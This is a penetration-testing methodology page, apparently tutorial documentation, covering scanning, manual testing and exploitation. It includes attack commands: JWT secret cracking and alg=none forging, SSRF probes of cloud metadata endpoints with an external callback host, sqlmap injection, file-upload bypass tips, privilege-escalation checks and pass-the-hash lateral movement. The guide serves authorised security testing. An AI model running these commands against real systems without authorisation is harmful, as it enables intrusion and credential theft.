Analysis & Exploitation¶
You've mapped the target's attack surface — now find the weaknesses
This is where scanners earn their keep and where humans earn their pay
Automated Scanning¶
Cover ground fast , then double-check everything
Web Application Scanners¶
# Nikto — quick web server scan
nikto -h https://target.com -o nikto_report.html
# ZAP — full-featured , great for CI/CD pipelines
zap-full-scan.py -t https://target.com -r zap_report.html
# Nuclei — template-based vuln detection
nuclei -u https://target.com -t nuclei-templates/ -o nuclei_results.txt
Network Vulnerability Scanners¶
# Nessus (requires commercial license)
nessuscli scan --target target.com --policy "Basic Network Scan"
# OpenVAS — open source alternative
gvm-cli scan --target target.com
Automated scanning philosophy: * Start broad , then drill deep * Every automated finding gets manual verification * False positives are your enemy — verify verify verify
Manual Assessment¶
Automated tools miss business logic flaws , race conditions , and creative exploitation paths
This is where you earn the big bucks
Business Logic Testing¶
# Price manipulation in e-commerce
# Try negative numbers , decimals , or intercepting cart updates
# Example: change price parameter in POST request
POST /api/cart/update
{"item_id": "123", "quantity": 1, "price": 0.01}
API Security Testing¶
# Endpoint discovery from JS files
grep -r "api." /path/to/js/files/ | sort -u
# GraphQL introspection query
curl -X POST https://target.com/graphql -H "Content-Type: application/json" \
-d '{"query": "{__schema{types{name fields{name}}}}"}'
# Parameter fuzzing
ffuf -u https://api.target.com/v1/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/objects.txt
JWT Attacks¶
# Decode JWT without verification
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
# Try common secrets
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -C -d /usr/share/wordlists/rockyou.txt
# Change algorithm to "none"
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -X a
SSRF Testing¶
# Blind SSRF check with Burp collaborator or interactsh
curl -X POST https://target.com/fetch \
-d '{"url": "http://YOUR-BURP-COLLABORATOR"}'
# Cloud metadata endpoints to try
# http://169.254.169.254/latest/meta-data/ (AWS)
# http://metadata.google.internal/ (GCP)
# http://169.254.169.254/metadata/instance?api-version=2021-02-01 (Azure)
Threat Modeling¶
Proactive hunting — find the weakness before it finds you
- Draw data flow diagrams to understand trust boundaries
- Build attack trees for complex scenarios
- Prioritize findings by business impact , not CVSS score
flowchart TD
A[Identify Assets] --> B[Map Data Flows]
B --> C[Find Trust Boundaries]
C --> D[Enumerate Threats]
D --> E[Assess Risk]
E --> F[Prioritize]
F --> G[Exploit/Report]Exploitation¶
Safe , controlled exploitation to demonstrate real impact
# SQL injection with sqlmap
sqlmap -u "https://target.com/search?q=test" \
--batch --risk=3 --level=5 --dbs
# XSS detection with XSStrike
python3 xsstrike.py -u "https://target.com/search" --params --crawl
# File upload bypass — try all the tricks
# 1. Change extension (.php -> .php5, .phtml)
# 2. Modify Content-Type header
# 3. Add magic bytes to bypass signature detection
Privilege Escalation¶
Linux¶
# Check SUID binaries
find / -perm -4000 2>/dev/null
# Check sudo permissions
sudo -l
# Look for writable scripts in cron directories
ls -la /etc/cron*
# Environment variable abuse
# Check if you can modify LD_PRELOAD
Windows (PowerShell)¶
# Check service permissions
Get-Service | Where-Object {$_.Status -eq "Running"}
# Check AlwaysInstallElevated
Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
# Check unquoted service paths
wmic service get name,pathname | findstr /i /v "C:\Windows"
Lateral Movement¶
# Pass-the-hash with Impacket
impacket-psexec DOMAIN/user@target -hashes LMHASH:NTHASH
# SSH key reuse
for key in ~/.ssh/id_*; do ssh -i "$key" user@target; done
# PSExec for Windows lateral movement
psexec \\target -u DOMAIN\user -p password cmd
Every finding you exploit gets documented — you're proving impact , not having fun
Save the fun for the lab